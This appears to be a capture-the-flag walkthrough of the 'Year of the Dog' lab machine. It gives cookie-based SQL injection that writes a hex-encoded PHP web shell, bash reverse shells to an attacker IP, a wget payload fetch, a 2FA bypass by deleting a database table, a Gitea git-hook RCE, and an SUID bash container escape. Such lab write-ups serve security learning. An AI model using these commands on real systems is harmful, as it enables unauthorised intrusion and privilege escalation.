3 minutes
Year of the Dog
Machine URL :: Year of the Dog
ENUMERATION
Nmap scan: nmap -p- -vv <MACHINE-IP> -oG initial-scan
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
SSH on port 22 and webserver on port 80 as usual.
WEB SERVER
data:image/s3,"s3://crabby-images/ede4f/ede4f0b18566799314088b386d0ba0005cd5a905" alt="Hello Friend"
I used gobuster for any hidden directories but got nothing.\
SQL INJECTION
Using burp , we see there is a cookie being stored. We could do some injection with the cookie.
data:image/s3,"s3://crabby-images/19ca8/19ca82bf8cc05c2a84657bc39ff8e69b5e921f3f" alt="Hello Friend"
This confirms that SQLi is the way to go. UNION SELECT works.\
Cookie: id=6957bbd77dec77da95bbe62b24d2a92f' UNION SELECT 1,database() -- -
gives databse webapp
data:image/s3,"s3://crabby-images/9c087/9c087417fb6f59868d0b24a9f553a59c5e20d68b" alt="Hello Friend"
UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='webapp' -- -
gives table queue
UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_schema='webapp' and table_name='queue'-- -
gives 2 columns : userID
and queueNum
Seems like we can even write to webroot using : INTO OUTFILE '/var/www/html/
UNION SELECT 1,'testing' INTO OUTFILE '/var/www/html/test.txt'-- -
gives :
Using Command :
UNION SELECT 1,LOAD_FILE('/etc/passwd') -- -
we got 1 user:
dylan:x:1000:1000:dylan,,,:/home/dylan:/bin/bash
As RCE detection is triggered by <? we’ll have to hex encode our payload and then pass it through SQL unhex function.
UNION SELECT 1,UNHEX('3C3F7068702073797374656D28244745545B27636D64275D293B203F3E') INTO OUTFILE '/var/www/html/cmd.php' -- -
Now if it works:
data:image/s3,"s3://crabby-images/85902/859022d36b79ac072261b4e55ed27407d3ef58b2" alt="Hello Friend"
It works! \
INITIAL EXPLOIT
Now to move in , save this :
bash -i >& /dev/tcp/<IP Address>/<PORT> 0>&1
to a file and transfer it to the webserver using :
<MACHINE-IP>/cmd.php?cmd=wget <YOUR-IP>:<PORT>/<file>
data:image/s3,"s3://crabby-images/db376/db376781eeac9ff038fad32d3e950fdf8c7015fb" alt="Hello Friend"
You should be in:
data:image/s3,"s3://crabby-images/02b86/02b8638467c173d5c72b7b52e1ea74f575817633" alt="Hello Friend"
We are www-data. There is the user flag in dylan’s home directory but we don’t have the permission to read it. We can read the work_analysis file though. In there we find Dylan’s SSH password.
data:image/s3,"s3://crabby-images/3faf8/3faf85019cb5b3dc96ccc1201024acad22bf6eb2" alt="Hello Friend"
FOOTHOLD
data:image/s3,"s3://crabby-images/69d3d/69d3d4a923a54937d40b36d60c27c1be168721fd" alt="Hello Friend"
Using ifconfig
, there seems to be a docker address. We don’t seem to be in a container so probably that will come later.
data:image/s3,"s3://crabby-images/25866/2586630c8a6ad4823c5b648c6847bc586593f73d" alt="Hello Friend"
Using LinPeas , we find /app/gitea/gitea web
process running under dylan. Also that localhost is available on port 3000.
Let’s use SSH port forwarding and check out that portssh dylan@<MACHINE-IP> -L 3000:localhost:3000
data:image/s3,"s3://crabby-images/7d054/7d0542b3cf321d7ad9cf201b1455eccdd3f65ee7" alt="Hello Friend"
Signing in as dylan we get a 2 factor authentication.
data:image/s3,"s3://crabby-images/8308f/8308fe0a2fc73c22175bf57f9ce381def5a71160" alt="Hello Friend"
Going back to dylan, checking gitea
we find a db: gitea.db
which is an SQLite3 database.
data:image/s3,"s3://crabby-images/ec5da/ec5daae5f6fae99357cb50ef996c645f00d4f58f" alt="Hello Friend"
Let’s delete the two_factor table
from gitea.db
:
data:image/s3,"s3://crabby-images/44fca/44fca97d999a42d8b04a79c2ae8a5d1cdb578760" alt="Hello Friend"
And we’re in:
data:image/s3,"s3://crabby-images/e2294/e2294b857016c194e83ed20731ab50b6503dfc21" alt="Hello Friend"
EXPLOITATION
Now searching for any Gitea version 1.13.0 exploits , I found CVE-2020-14144 exploit.
In the Test-repo, we go to settings
> Git Hooks
> Post Recieve Hook
.
In this hook , we can write a shell script that will get executed after getting a new commit.
Add bash -i >& /dev/tcp/<YOUR-IP>/<CHOSEN-PORT> 0>&1
to Post Recieve Hook and update it.
Start a netcat listener, then on your local machine :
git clone http://localhost:3000/Dylan/Test-repo.git
cd Test-repo
echo "something" >> README.md
git add README.md
git commit -m 'RCE'
git push
data:image/s3,"s3://crabby-images/78da5/78da5ccbf80d4e66a39fdbfe443bddb51e0fc0a3" alt="Hello Friend"
PRIVILEGE ESCALATION > ROOT
Now , we’re in the container confirmed by the .dockerenv
file in /
and we gotta break out. We can su
rightaway.
data:image/s3,"s3://crabby-images/79f00/79f006caf3cc809f84f8337d522b665d5df7169d" alt="Hello Friend"
Check the /data/
directory as the files are usually mount to host.\
This is the case here as well as the files in /data
are identical to the /gitea
directory in Dylan’s shell.
Now just transfer the bash file located in /bin/
to /data/
and add the permissions.
data:image/s3,"s3://crabby-images/110bf/110bf9192580c1de8f6bb2bbc72d54d599296086" alt="Hello Friend"
Back at Dylan’s: run ./bash -p
and you got root.
data:image/s3,"s3://crabby-images/38777/387772515e751569ff9510f8fe8df5576ce1f7a0" alt="Hello Friend"